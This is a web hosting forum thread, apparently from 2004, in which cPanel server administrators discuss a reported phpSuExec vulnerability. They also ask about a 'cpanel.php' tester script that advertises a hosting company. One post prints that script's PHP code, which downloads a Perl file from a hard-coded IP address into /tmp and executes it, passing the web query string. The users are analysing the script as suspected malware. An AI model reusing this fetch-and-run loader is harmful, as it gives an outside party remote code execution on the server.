LBJ

Well-Known Member
Nov 1, 2003
101
16
168
cPanel Access Level
DataCenter Provider
Has anyone seen any details regarding a vulnerability in phpSuExec on cpanel servers where Apache was compiled with PHPSuExec before April 15th, 2004?

We received a brief email notification from a subscribed list about it but have been unable to dig up any corroboration.

I ran a search on the forum but was unable to find any related info.

Any pointers to some documentation would be most gratefully received.

LBJ
 

EDevil

Member
Feb 17, 2004
21
0
151
Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
 

Celta

Member
Aug 30, 2003
19
0
151
Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
Anyone has successfully fixed this vulnerability ? I have recompiled too but result is the same. I'm using Apache 1.3.31 - PHP 4.3.6 right now, but tester php script shows I am still vulnerable :/

I'd like to know what options you check on WHM when building apache.

Thanks in advance.
 

SarcNBit

Well-Known Member
Oct 14, 2003
1,001
3
168
From the linked article:
I already notified the cPanel authors of this vulnerability and it has been repaired.
Does anyone now the changelog entry or bugtrak ID for this?

I see that they are now saying that the security audit is 70% complete.
 

Celta

Member
Aug 30, 2003
19
0
151
It worked ! :)

Note that switching to phpsuexec, all customers must remove php_flags lines from .htaccess and that all .php files must have ownership of their respective users.
Changing that, I've corrected 99% of faillures.

Still to figure why some scripts (i.e. Typo3) doesn't work :/ ( maybe symlink issues in php files ?)
 

eazistore

Well-Known Member
Nov 7, 2003
69
0
156
Singapore
vulnerability fix?

Originally posted by Celta
Anyone has successfully fixed this vulnerability ? I have recompiled too but result is the same. I'm using Apache 1.3.31 - PHP 4.3.6 right now, but tester php script shows I am still vulnerable :/

I'd like to know what options you check on WHM when building apache.

Thanks in advance.
We are running WHM 9.3.0 cPanel 9.3.0-C55
Fedora - WHM X v3.1.0

Apache Core :1.3.31
PHP Suexec: 0.1b

After doing the cpanel.php test, we get this result:
http://www.eazistore.com/cpanel.php

Performing white box security audit...
PASSED: cPanel INSTALLED (9.3.0-CURRENT_55)
PASSED: Privileged UID Vulnerability Check (32022)
FAILED: Stealth Snoop Vulnerability [/home/eazistor] Explain
PASSED: Simple $HOME Scanning [/home/eazistor]
PASSED: Group $HOME Scanning [/home/eazistor]
PASSED: Root /home scanning
PASSED: Simple WEBROOT Protection
PASSED: Real WEBROOT Protection
PASSED: SUEXEC mod_phpsuexec Exploit Test
FAILED: One or more insecure cPanel configurations were detected. Visit A-Squad.Com for details on where to find more secure cPanel hosting.


Any suggestion how to fix the FAILED status?

Sincerely,
Vincent
http://www.eazistore.com/
 

goodmove

Well-Known Member
May 12, 2003
643
4
168
If you can execute the cpanel.php script, that means you are also vulnerable for allowing scripts to run from your /tmp directory.

Cpanel.php fetches a .pl file from an obscure IP address and runs it from /tmp directory.
 

tAzMaNiAc

Well-Known Member
Feb 16, 2003
558
0
166
Sachse, TX
A-Squad is using this as an advertisement for themselves as an hoster. :)

That's a no-no.

"If you host with A-Squad, you'll be safe."

That already turned me off.
 

eazistore

Well-Known Member
Nov 7, 2003
69
0
156
Singapore
Re: hi

Originally posted by shann
hi eazistore,

I have same stauts coming. Did you get any fixed?. Please update it.

Thank You
Shann
Hello Shann,

After reading a few post above us here, I am starting to smell a fist too. It looks like it's an advertisement to use their services. Visit ??????.Com for details on where to find more secure cPanel hosting.

I am not too sure if it's really an advertisement or just a scam to bring sales.

What's your comment Shann?

Rgds,
Vincent
http://www.eazistore.com
 

shann

Well-Known Member
Jul 5, 2002
366
0
166
cPanel Access Level
Website Owner
hi

Hi,

I haven't deeply look at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
 

eazistore

Well-Known Member
Nov 7, 2003
69
0
156
Singapore
/tmp

Originally posted by shann
Hi,

I haven't deeply look at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
Hi Shann,

From what I see inside the code:
<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://64.240.171.106/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
echo `perl $tester '$QUERY_STRING' 2>&1`;
?>


I might not know much about php scripts but this line look suspicious $tester = "/tmp/tests.pl";

I have remove that cpanel.php file from my server to cause any hard to it.

I hopw some coder can explain if that script could cause any harm.

Rgds,
Vincent Kam
 

eazistore

Well-Known Member
Nov 7, 2003
69
0
156
Singapore
tests.pl code

Originally posted by shann
Hi,

I haven't deeply look at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
Hi,

I have look into my /tmp and indeed there is a tests.pl in it!
I delete it immediately to avoid trouble of coz.

Here's the tests.pl contents if anybody would like to inspect it.